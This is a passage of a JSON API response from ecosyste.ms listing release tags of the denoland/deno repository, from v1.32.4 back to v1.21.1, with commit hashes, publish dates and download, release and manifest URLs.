ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifest